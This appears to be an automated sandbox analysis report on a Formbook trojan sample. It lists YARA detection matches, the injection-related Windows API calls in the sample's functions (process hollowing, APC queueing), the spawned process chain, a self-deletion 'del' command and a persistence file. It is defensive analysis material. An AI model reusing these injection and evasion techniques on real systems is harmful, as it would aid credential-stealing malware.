              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: Fpopgapwdcgvxn.exe PID: 2268, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: colorcpl.exe PID: 5112, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR; Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
              Source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: colorcpl.exe PID: 6928, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: chkdsk.exe PID: 6856, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: String function: 032B4B0C appears 357 times
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: String function: 032B6B54 appears 87 times
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: String function: 032B4980 appears 76 times
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: String function: 032B4788 appears 84 times
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 1E675130 appears 58 times
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 1E6AEA12 appears 86 times
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 1E62B970 appears 280 times
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 1E687E54 appears 102 times
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 1E6BF290 appears 105 times
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_0330CB08 InetIsOffline,CoInitialize,CoUninitialize,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess, 0_2_0330CB08
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_03308E64 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,RtlCreateUserThread,CloseHandle, 0_2_03308E64
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_0330B780 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_0330B780
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_0330B69C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_0330B69C
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_032CFB88 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_032CFB88
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_032CFD40 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,GetCurrentProcess,NtFlushInstructionCache,FreeLibrary, 0_2_032CFD40
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_0330B614 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_0330B614
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_032CFB86 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_032CFB86
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_032D7E64 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread, 0_2_032D7E64
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe Code function: 0_2_032CFCE0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_032CFCE0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_068CA450 NtClose, 3_2_068CA450
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_068CA500 NtAllocateVirtualMemory, 3_2_068CA500
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_068CA3D0 NtReadFile, 3_2_068CA3D0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_068CA320 NtCreateFile, 3_2_068CA320
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_068CA4FA NtAllocateVirtualMemory, 3_2_068CA4FA
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_068CA44A NtClose, 3_2_068CA44A
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_068CA3CB NtReadFile, 3_2_068CA3CB
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_068CA322 NtCreateFile, 3_2_068CA322
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_068CA373 NtCreateFile, 3_2_068CA373
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_1E672EA0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672E80 NtReadVirtualMemory,LdrInitializeThunk, 3_2_1E672E80
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672F30 NtCreateSection,LdrInitializeThunk, 3_2_1E672F30
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672FE0 NtCreateFile,LdrInitializeThunk, 3_2_1E672FE0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672FB0 NtResumeThread,LdrInitializeThunk, 3_2_1E672FB0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672F90 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_1E672F90
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_1E672C70
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672CA0 NtQueryInformationToken,LdrInitializeThunk, 3_2_1E672CA0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672D30 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_1E672D30
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672D10 NtMapViewOfSection,LdrInitializeThunk, 3_2_1E672D10
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_1E672DF0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672DD0 NtDelayExecution,LdrInitializeThunk, 3_2_1E672DD0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672AD0 NtReadFile,LdrInitializeThunk, 3_2_1E672AD0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672B60 NtClose,LdrInitializeThunk, 3_2_1E672B60
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E672BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_1E672BF0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E673D70 NtOpenThread, 3_2_1E673D70
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E673D10 NtOpenProcessToken, 3_2_1E673D10
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E6739B0 NtGetContextThread, 3_2_1E6739B0
              Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 3_2_1E6735C0 NtCreateMutant, 3_2_1E6735C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E673010 NtOpenDirectoryObject,3_2_1E673010
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E673090 NtSetValueKey,3_2_1E673090
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672E30 NtWriteVirtualMemory,3_2_1E672E30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672EE0 NtQueueApcThread,3_2_1E672EE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672F60 NtCreateProcessEx,3_2_1E672F60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672FA0 NtQuerySection,3_2_1E672FA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672C60 NtCreateKey,3_2_1E672C60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672C00 NtQueryInformationProcess,3_2_1E672C00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672CF0 NtOpenProcess,3_2_1E672CF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672CC0 NtQueryVirtualMemory,3_2_1E672CC0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672D00 NtSetInformationFile,3_2_1E672D00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672DB0 NtEnumerateKey,3_2_1E672DB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672AF0 NtWriteFile,3_2_1E672AF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672AB0 NtWaitForSingleObject,3_2_1E672AB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672BE0 NtQueryValueKey,3_2_1E672BE0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672BA0 NtEnumerateValueKey,3_2_1E672BA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E672B80 NtQueryInformationFile,3_2_1E672B80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E674650 NtSuspendThread,3_2_1E674650
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E674340 NtSetContextThread,3_2_1E674340
              Source: Fpopgapwdcgvxn.exeBinary or memory string: OriginalFilename vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Fpopgapwdcgvxn.exe
              Source: Fpopgapwdcgvxn.exe, 00000000.00000002.2322773738.00000000031B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs Fpopgapwdcgvxn.exe
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeFile created: C:\Users\Public\Libraries\Telragab.PIFJump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@294/7@13/7
              Source: C:\Windows\explorer.exeFile read: C:\Users\Public\Libraries\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032D3470 GetLastError,FormatMessageA,0_2_032D3470
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Telragab.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032CA27C FindResourceA,LoadResource,SizeofResource,LockResource,0_2_032CA27C
              Source: Fpopgapwdcgvxn.exeReversingLabs: Detection: 70%
              Source: Fpopgapwdcgvxn.exeVirustotal: Detection: 69%
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeFile read: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Telragab.PIF "C:\Users\Public\Libraries\Telragab.PIF"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Telragab.PIF "C:\Users\Public\Libraries\Telragab.PIF"
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 2180
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Telragab.PIF "C:\Users\Public\Libraries\Telragab.PIF" Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Telragab.PIF "C:\Users\Public\Libraries\Telragab.PIF" Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f6a4b5c1-c228-4a11-af40-362874d34b75
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032CEF94 CoCreateInstance,0_2_032CEF94
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032B8F58 GetDiskFreeSpaceA,0_2_032B8F58
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_03308AB4 CreateToolhelp32Snapshot,0_2_03308AB4
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
              Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4784:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess368
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
              Source: Fpopgapwdcgvxn.exeStatic file information: File size 2403840 > 1048576
              Source: Fpopgapwdcgvxn.exeStatic PE information: Raw size of DATA is bigger than: 0x100000 < 0x1c8a00
              Source: Binary string: chkdsk.pdbGCTL source: colorcpl.exe, 0000000C.00000003.2612449594.0000000002661000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2613913537.0000000004590000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2617872903.0000000000590000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: colorcpl.pdbGCTL source: explorer.exe, 00000005.00000002.4633580692.000000001097F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.0000000004DBF000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4612887516.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: colorcpl.pdb source: explorer.exe, 00000005.00000002.4633580692.000000001097F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.0000000004DBF000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4612887516.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: chkdsk.pdb source: colorcpl.exe, 0000000C.00000003.2612449594.0000000002661000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2613913537.0000000004590000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2617872903.0000000000590000.00000040.80000000.00040000.00000000.sdmp
